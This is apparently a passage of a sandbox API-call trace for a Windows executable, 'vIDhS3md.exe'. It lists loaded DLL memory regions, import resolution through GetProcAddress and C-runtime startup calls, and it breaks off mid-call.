entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6782 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6783 start_va = 0x7feb0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 6870 start_va = 0x1e0000 end_va = 0x29dfff entry_point = 0x1e0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6871 start_va = 0x20000 end_va = 0x23fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 6872 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 6873 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6874 start_va = 0x2a0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 6875 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 6876 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 6877 start_va = 0x7ffd8000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 6878 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 6879 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 6880 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 6881 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 6882 start_va = 0x74eb0000 end_va = 0x74f6dfff entry_point = 0x74eb0000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 6883 start_va = 0x74f70000 end_va = 0x75129fff entry_point = 0x74f70000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 6884 start_va = 0x771d0000 end_va = 0x7725cfff entry_point = 0x771d0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 6885 start_va = 0x74ad0000 end_va = 0x74c0ffff entry_point = 0x74ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 6921 start_va = 0x77370000 end_va = 0x774bcfff entry_point = 0x77370000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 6922 start_va = 0x74c10000 end_va = 0x74c53fff entry_point = 0x74c10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 6923 start_va = 0x752c0000 end_va = 0x7667efff entry_point = 0x752c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 6924 start_va = 0x76800000 end_va = 0x76cdcfff entry_point = 0x76800000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 6925 start_va = 0x752b0000 end_va = 0x752bbfff entry_point = 0x752b0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 6926 start_va = 0x74ce0000 end_va = 0x74d23fff entry_point = 0x74ce0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 6927 start_va = 0x77100000 end_va = 0x7710efff entry_point = 0x77100000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 6928 start_va = 0x74380000 end_va = 0x74411fff entry_point = 0x74380000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll") Region: id = 6929 start_va = 0x745d0000 end_va = 0x745d7fff entry_point = 0x745d0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 6930 start_va = 0x480000 end_va = 0x56ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 6931 start_va = 0x640000 end_va = 0x73ffff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 6932 start_va = 0x480000 end_va = 0x4a9fff entry_point = 0x480000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 6933 start_va = 0x560000 end_va = 0x56ffff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 6934 start_va = 0x740000 end_va = 0x8c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Region: id = 6935 start_va = 0x75220000 end_va = 0x7524afff entry_point = 0x75220000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 6936 start_va = 0x76da0000 end_va = 0x76ebffff entry_point = 0x76da0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 6937 start_va = 0x8d0000 end_va = 0xa50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 6938 start_va = 0xa60000 end_va = 0x1e5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a60000" filename = "" Region: id = 6939 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6940 start_va = 0x3e0000 end_va = 0x3e0fff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 6941 start_va = 0x1e60000 end_va = 0x1f7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Thread: id = 847 os_tid = 0xe48 [0266.919] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x75130000 [0266.919] GetProcAddress (hModule=0x75130000, lpProcName="SetEvent") returned 0x751560c0 [0266.919] GetProcAddress (hModule=0x75130000, lpProcName="WaitForSingleObject") returned 0x75156110 [0266.919] GetProcAddress (hModule=0x75130000, lpProcName="DeviceIoControl") returned 0x751487e0 [0266.919] GetProcAddress (hModule=0x75130000, lpProcName="DuplicateHandle") returned 0x75155f30 [0266.919] GetProcAddress (hModule=0x75130000, lpProcName="FormatMessageW") returned 0x75154a40 [0266.919] GetProcAddress (hModule=0x75130000, lpProcName="CreateEventW") returned 0x75155fa0 [0266.919] GetProcAddress (hModule=0x75130000, lpProcName="CreateProcessW") returned 0x7514a510 [0266.919] GetProcAddress (hModule=0x75130000, lpProcName="ExpandEnvironmentStringsW") returned 0x7514c8c0 [0266.919] GetProcAddress (hModule=0x75130000, lpProcName="GetDriveTypeW") returned 0x75156300 [0266.919] GetProcAddress (hModule=0x75130000, lpProcName="GetSystemDirectoryW") returned 0x75149a90 [0266.920] GetProcAddress (hModule=0x75130000, lpProcName="DeleteFileW") returned 0x751561b0 [0266.920] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadErrorMode") returned 0x7514fae0 [0266.920] GetProcAddress (hModule=0x75130000, lpProcName="HeapSize") returned 0x779e4f40 [0266.920] GetProcAddress (hModule=0x75130000, lpProcName="LCMapStringW") returned 0x75149a40 [0266.920] GetProcAddress (hModule=0x75130000, lpProcName="GetStringTypeW") returned 0x751479b0 [0266.920] GetProcAddress (hModule=0x75130000, lpProcName="TerminateThread") returned 0x7514fcb0 [0266.920] GetProcAddress (hModule=0x75130000, lpProcName="OpenProcess") returned 0x751492b0 [0266.920] GetProcAddress (hModule=0x75130000, lpProcName="GetVersion") returned 0x7514a300 [0266.920] GetProcAddress (hModule=0x75130000, lpProcName="CreateFileW") returned 0x75156180 [0266.920] GetProcAddress (hModule=0x75130000, lpProcName="FindResourceW") returned 0x75153a50 [0266.920] GetProcAddress (hModule=0x75130000, lpProcName="SizeofResource") returned 0x75148cb0 [0266.920] GetProcAddress (hModule=0x75130000, lpProcName="CloseHandle") returned 0x75155f20 [0266.920] GetProcAddress (hModule=0x75130000, lpProcName="SetLastError") returned 0x75142af0 [0266.920] GetProcAddress (hModule=0x75130000, lpProcName="LoadResource") returned 0x751478f0 [0266.920] GetProcAddress (hModule=0x75130000, lpProcName="GetLastError") returned 0x75142db0 [0266.921] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcess") returned 0x75142da0 [0266.921] GetProcAddress (hModule=0x75130000, lpProcName="LockResource") returned 0x75147a50 [0266.921] GetProcAddress (hModule=0x75130000, lpProcName="GetCommandLineW") returned 0x7514a4b0 [0266.921] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleHandleW") returned 0x75149660 [0266.921] GetProcAddress (hModule=0x75130000, lpProcName="LoadLibraryW") returned 0x7514a0b0 [0266.921] GetProcAddress (hModule=0x75130000, lpProcName="GetStdHandle") returned 0x7514a060 [0266.921] GetProcAddress (hModule=0x75130000, lpProcName="LocalFree") returned 0x751487c0 [0266.921] GetProcAddress (hModule=0x75130000, lpProcName="LocalAlloc") returned 0x75148840 [0266.921] GetProcAddress (hModule=0x75130000, lpProcName="GetProcAddress") returned 0x75147940 [0266.921] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleFileNameW") returned 0x75149560 [0266.921] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleScreenBufferInfo") returned 0x751569c0 [0266.921] GetProcAddress (hModule=0x75130000, lpProcName="GetFileType") returned 0x75156390 [0266.921] GetProcAddress (hModule=0x75130000, lpProcName="OutputDebugStringW") returned 0x75171c30 [0266.921] GetProcAddress (hModule=0x75130000, lpProcName="ReadConsoleW") returned 0x751568e0 [0266.921] GetProcAddress (hModule=0x75130000, lpProcName="WriteConsoleW") returned 0x75156920 [0266.922] GetProcAddress (hModule=0x75130000, lpProcName="SetFilePointerEx") returned 0x75156540 [0266.922] GetProcAddress (hModule=0x75130000, lpProcName="EnterCriticalSection") returned 0x779d5e80 [0266.922] GetProcAddress (hModule=0x75130000, lpProcName="LeaveCriticalSection") returned 0x779d5e00 [0266.922] GetProcAddress (hModule=0x75130000, lpProcName="SetStdHandle") returned 0x751726a0 [0266.922] GetProcAddress (hModule=0x75130000, lpProcName="HeapAlloc") returned 0x779cda90 [0266.922] GetProcAddress (hModule=0x75130000, lpProcName="EncodePointer") returned 0x779ef190 [0266.922] GetProcAddress (hModule=0x75130000, lpProcName="DecodePointer") returned 0x779ea200 [0266.922] GetProcAddress (hModule=0x75130000, lpProcName="ExitProcess") returned 0x751574f0 [0266.922] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleHandleExW") returned 0x75149fa0 [0266.922] GetProcAddress (hModule=0x75130000, lpProcName="MultiByteToWideChar") returned 0x75142d60 [0266.922] GetProcAddress (hModule=0x75130000, lpProcName="WideCharToMultiByte") returned 0x751475a0 [0266.922] GetProcAddress (hModule=0x75130000, lpProcName="HeapFree") returned 0x751425e0 [0266.922] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleMode") returned 0x75156870 [0266.922] GetProcAddress (hModule=0x75130000, lpProcName="ReadConsoleInputA") returned 0x751568c0 [0266.922] GetProcAddress (hModule=0x75130000, lpProcName="SetConsoleMode") returned 0x75156900 [0266.923] GetProcAddress (hModule=0x75130000, lpProcName="CreateThread") returned 0x75149700 [0266.923] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentThreadId") returned 0x75141b90 [0266.923] GetProcAddress (hModule=0x75130000, lpProcName="ExitThread") returned 0x779f2570 [0266.923] GetProcAddress (hModule=0x75130000, lpProcName="LoadLibraryExW") returned 0x75147920 [0266.923] GetProcAddress (hModule=0x75130000, lpProcName="DeleteCriticalSection") returned 0x779e9920 [0266.923] GetProcAddress (hModule=0x75130000, lpProcName="FlushFileBuffers") returned 0x751562a0 [0266.923] GetProcAddress (hModule=0x75130000, lpProcName="WriteFile") returned 0x75156590 [0266.923] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleCP") returned 0x75156860 [0266.923] GetProcAddress (hModule=0x75130000, lpProcName="IsDebuggerPresent") returned 0x7514a790 [0266.923] GetProcAddress (hModule=0x75130000, lpProcName="IsProcessorFeaturePresent") returned 0x75149680 [0266.923] GetProcAddress (hModule=0x75130000, lpProcName="ReadFile") returned 0x751564a0 [0266.923] GetProcAddress (hModule=0x75130000, lpProcName="GetStartupInfoW") returned 0x7514a080 [0266.923] GetProcAddress (hModule=0x75130000, lpProcName="UnhandledExceptionFilter") returned 0x751728e0 [0266.923] GetProcAddress (hModule=0x75130000, lpProcName="SetUnhandledExceptionFilter") returned 0x7514a2c0 [0266.923] GetProcAddress (hModule=0x75130000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x75156020 [0266.924] GetProcAddress (hModule=0x75130000, lpProcName="Sleep") returned 0x751477b0 [0266.924] GetProcAddress (hModule=0x75130000, lpProcName="TerminateProcess") returned 0x7514fbc0 [0266.924] GetProcAddress (hModule=0x75130000, lpProcName="TlsAlloc") returned 0x75149a70 [0266.924] GetProcAddress (hModule=0x75130000, lpProcName="TlsGetValue") returned 0x75141ba0 [0266.924] GetProcAddress (hModule=0x75130000, lpProcName="TlsSetValue") returned 0x75141da0 [0266.924] GetProcAddress (hModule=0x75130000, lpProcName="TlsFree") returned 0x75149930 [0266.924] GetProcAddress (hModule=0x75130000, lpProcName="IsValidCodePage") returned 0x7514a090 [0266.924] GetProcAddress (hModule=0x75130000, lpProcName="GetACP") returned 0x75148770 [0266.924] GetProcAddress (hModule=0x75130000, lpProcName="GetOEMCP") returned 0x7514fd10 [0266.924] GetProcAddress (hModule=0x75130000, lpProcName="GetCPInfo") returned 0x75149fc0 [0266.924] GetProcAddress (hModule=0x75130000, lpProcName="GetProcessHeap") returned 0x75147910 [0266.924] GetProcAddress (hModule=0x75130000, lpProcName="RtlUnwind") returned 0x75149a80 [0266.924] GetProcAddress (hModule=0x75130000, lpProcName="QueryPerformanceCounter") returned 0x75142dc0 [0266.924] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcessId") returned 0x75141d90 [0266.924] GetProcAddress (hModule=0x75130000, lpProcName="GetSystemTimeAsFileTime") returned 0x75142b90 [0266.925] GetProcAddress (hModule=0x75130000, lpProcName="GetEnvironmentStringsW") returned 0x7514a3b0 [0266.925] GetProcAddress (hModule=0x75130000, lpProcName="FreeEnvironmentStringsW") returned 0x7514a0f0 [0266.925] GetProcAddress (hModule=0x75130000, lpProcName="HeapReAlloc") returned 0x779cbae0 [0266.925] GetProcAddress (hModule=0x75130000, lpProcName="SetEndOfFile") returned 0x751564f0 [0266.925] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74c60000 [0266.925] GetProcAddress (hModule=0x74c60000, lpProcName="GetTokenInformation") returned 0x74c7ed40 [0266.925] GetProcAddress (hModule=0x74c60000, lpProcName="RegDeleteKeyW") returned 0x74c7fca0 [0266.925] GetProcAddress (hModule=0x74c60000, lpProcName="LookupPrivilegeValueW") returned 0x74c795e0 [0266.925] GetProcAddress (hModule=0x74c60000, lpProcName="AdjustTokenPrivileges") returned 0x74c80680 [0266.925] GetProcAddress (hModule=0x74c60000, lpProcName="OpenProcessToken") returned 0x74c7ee90 [0266.925] GetProcAddress (hModule=0x74c60000, lpProcName="RegSetValueExW") returned 0x74c7f0a0 [0266.925] GetProcAddress (hModule=0x74c60000, lpProcName="RegQueryValueExW") returned 0x74c7ed60 [0266.925] GetProcAddress (hModule=0x74c60000, lpProcName="RegOpenKeyExW") returned 0x74c7ed80 [0266.925] GetProcAddress (hModule=0x74c60000, lpProcName="RegOpenKeyW") returned 0x74c7f590 [0266.925] GetProcAddress (hModule=0x74c60000, lpProcName="RegCreateKeyW") returned 0x74c806c0 [0266.926] GetProcAddress (hModule=0x74c60000, lpProcName="RegCloseKey") returned 0x74c7efa0 [0266.926] GetProcAddress (hModule=0x74c60000, lpProcName="LookupAccountSidW") returned 0x74c7f7b0 [0266.926] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x74eb0000 [0266.926] GetProcAddress (hModule=0x74eb0000, lpProcName="PrintDlgW") returned 0x74ebc6a0 [0266.926] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x77370000 [0266.926] GetProcAddress (hModule=0x77370000, lpProcName="StartPage") returned 0x7741ee10 [0266.926] GetProcAddress (hModule=0x77370000, lpProcName="EndDoc") returned 0x773f55a0 [0266.926] GetProcAddress (hModule=0x77370000, lpProcName="StartDocW") returned 0x773f57e0 [0266.926] GetProcAddress (hModule=0x77370000, lpProcName="SetMapMode") returned 0x773f9590 [0266.926] GetProcAddress (hModule=0x77370000, lpProcName="GetDeviceCaps") returned 0x773f0820 [0266.926] GetProcAddress (hModule=0x77370000, lpProcName="EndPage") returned 0x7741fbc0 [0266.926] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74ad0000 [0266.926] GetProcAddress (hModule=0x74ad0000, lpProcName="SendMessageW") returned 0x74ae38f0 [0266.926] GetProcAddress (hModule=0x74ad0000, lpProcName="DialogBoxIndirectParamW") returned 0x74afb6b0 [0266.926] GetProcAddress (hModule=0x74ad0000, lpProcName="EndDialog") returned 0x74afb430 [0266.927] GetProcAddress (hModule=0x74ad0000, lpProcName="LoadCursorW") returned 0x74ae7740 [0266.927] GetProcAddress (hModule=0x74ad0000, lpProcName="InflateRect") returned 0x74af74e0 [0266.927] GetProcAddress (hModule=0x74ad0000, lpProcName="GetSysColorBrush") returned 0x74afefa0 [0266.927] GetProcAddress (hModule=0x74ad0000, lpProcName="SetCursor") returned 0x74b04ed0 [0266.927] GetProcAddress (hModule=0x74ad0000, lpProcName="SetWindowTextW") returned 0x74af4580 [0266.927] GetProcAddress (hModule=0x74ad0000, lpProcName="GetDlgItem") returned 0x74af1540 [0266.927] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x745d0000 [0266.927] GetProcAddress (hModule=0x745d0000, lpProcName="GetFileVersionInfoW") returned 0x745d1580 [0266.927] GetProcAddress (hModule=0x745d0000, lpProcName="VerQueryValueW") returned 0x745d1500 [0266.927] GetProcAddress (hModule=0x745d0000, lpProcName="GetFileVersionInfoSizeW") returned 0x745d1560 [0266.927] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x2) returned 1 [0266.927] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x4) returned 1 [0266.927] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19ff70 | out: lpSystemTimeAsFileTime=0x19ff70*(dwLowDateTime=0x4c963b06, dwHighDateTime=0x1d45ac6)) [0266.927] GetCurrentThreadId () returned 0xe48 [0266.927] GetCurrentProcessId () returned 0x204 [0266.927] QueryPerformanceCounter (in: lpPerformanceCount=0x19ff68 | out: lpPerformanceCount=0x19ff68*=31439012950) returned 1 [0266.928] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0266.928] GetProcAddress (hModule=0x75130000, lpProcName="FlsAlloc") returned 0x7514a330 [0266.928] GetProcAddress (hModule=0x75130000, lpProcName="FlsFree") returned 0x7514f400 [0266.928] GetProcAddress (hModule=0x75130000, lpProcName="FlsGetValue") returned 0x75147580 [0266.928] GetProcAddress (hModule=0x75130000, lpProcName="FlsSetValue") returned 0x75149910 [0266.928] GetProcAddress (hModule=0x75130000, lpProcName="InitializeCriticalSectionEx") returned 0x75156030 [0266.928] GetProcAddress (hModule=0x75130000, lpProcName="CreateEventExW") returned 0x75155f90 [0266.928] GetProcAddress (hModule=0x75130000, lpProcName="CreateSemaphoreExW") returned 0x75155ff0 [0266.928] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadStackGuarantee") returned 0x7514a5d0 [0266.928] GetProcAddress (hModule=0x75130000, lpProcName="CreateThreadpoolTimer") returned 0x7514a690 [0266.928] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadpoolTimer") returned 0x779c40f0 [0266.928] GetProcAddress (hModule=0x75130000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x779bd630 [0266.929] GetProcAddress (hModule=0x75130000, lpProcName="CloseThreadpoolTimer") returned 0x779becf0 [0266.929] GetProcAddress (hModule=0x75130000, lpProcName="CreateThreadpoolWait") returned 0x75155720 [0266.929] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadpoolWait") returned 0x779be140 [0266.929] GetProcAddress (hModule=0x75130000, lpProcName="CloseThreadpoolWait") returned 0x779beb60 [0266.929] GetProcAddress (hModule=0x75130000, lpProcName="FlushProcessWriteBuffers") returned 0x779f9990 [0266.929] GetProcAddress (hModule=0x75130000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x779f5540 [0266.929] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcessorNumber") returned 0x779e9dc0 [0266.929] GetProcAddress (hModule=0x75130000, lpProcName="GetLogicalProcessorInformation") returned 0x7514a550 [0266.929] GetProcAddress (hModule=0x75130000, lpProcName="CreateSymbolicLinkW") returned 0x75170a40 [0266.929] GetProcAddress (hModule=0x75130000, lpProcName="SetDefaultDllDirectories") returned 0x74e60790 [0266.929] GetProcAddress (hModule=0x75130000, lpProcName="EnumSystemLocalesEx") returned 0x7514f8a0 [0266.929] GetProcAddress (hModule=0x75130000, lpProcName="CompareStringEx") returned 0x7514fa30 [0266.929] GetProcAddress (hModule=0x75130000, lpProcName="GetDateFormatEx") returned 0x75171030 [0266.929] GetProcAddress (hModule=0x75130000, lpProcName="GetLocaleInfoEx") returned 0x7514a000 [0266.929] GetProcAddress (hModule=0x75130000, lpProcName="GetTimeFormatEx") returned 0x751714b0 [0266.930] GetProcAddress (hModule=0x75130000, lpProcName="GetUserDefaultLocaleName") returned 0x7514a4f0 [0266.930] GetProcAddress (hModule=0x75130000, lpProcName="IsValidLocaleName") returned 0x751716f0 [0266.930] GetProcAddress (hModule=0x75130000, lpProcName="LCMapStringEx") returned 0x75149970 [0266.930] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentPackageId") returned 0x74de3c90 [0266.930] GetProcAddress (hModule=0x75130000, lpProcName="GetTickCount64") returned 0x75148710 [0266.930] GetProcAddress (hModule=0x75130000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0266.930] GetProcAddress (hModule=0x75130000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0266.930] GetCurrentThreadId () returned 0xe48 [0266.930] GetStartupInfoW (in: lpStartupInfo=0x19fed0 | out: lpStartupInfo=0x19fed0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="vIDhS3md.exe -accepteula \"Genko_1.jtp\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0x1cab2991, hStdError=0x475810)) [0266.930] GetStdHandle (nStdHandle=0xfffffff6) returned 0x38 [0266.930] GetFileType (hFile=0x38) returned 0x2 [0266.930] GetStdHandle (nStdHandle=0xfffffff5) returned 0xc0 [0266.930] GetFileType (hFile=0xc0) returned 0x3 [0266.930] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0266.930] GetFileType (hFile=0x40) returned 0x2 [0266.931] GetCommandLineW () returned="vIDhS3md.exe -accepteula \"Genko_1.jtp\" -nobanner" [0266.931] GetEnvironmentStringsW () returned 0x651e28* [0266.931] FreeEnvironmentStringsW (penv=0x651e28) returned 1 [0266.931] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x2a [0266.932] GetLastError () returned 0x0 [0266.932] SetLastError (dwErrCode=0x0) [0266.932] GetLastError () returned 0x0 [0266.932] SetLastError (dwErrCode=0x0) [0266.932] GetLastError () returned 0x0 [0266.932] SetLastError (dwErrCode=0x0) [0266.932] GetACP () returned 0x4e4 [0266.932] GetLastError () returned 0x0 [0266.932] SetLastError (dwErrCode=0x0) [0266.932] IsValidCodePage (CodePage=0x4e4) returned 1 [0266.932] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fec4 | out: lpCPInfo=0x19fec4) returned 1 [0266.932] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f98c | out: lpCPInfo=0x19f98c) returned 1 [0266.932] GetLastError () returned 0x0 [0266.932] SetLastError (dwErrCode=0x0) [0266.932] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0266.932] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f708, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0266.932] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpCharType=0x19f9a0 | out: lpCharType=0x19f9a0) returned 1 [0266.932] GetLastError () returned 0x0 [0266.932] SetLastError (dwErrCode=0x0) [0266.932] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0266.932] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f6d8, cchWideChar=256 | out: 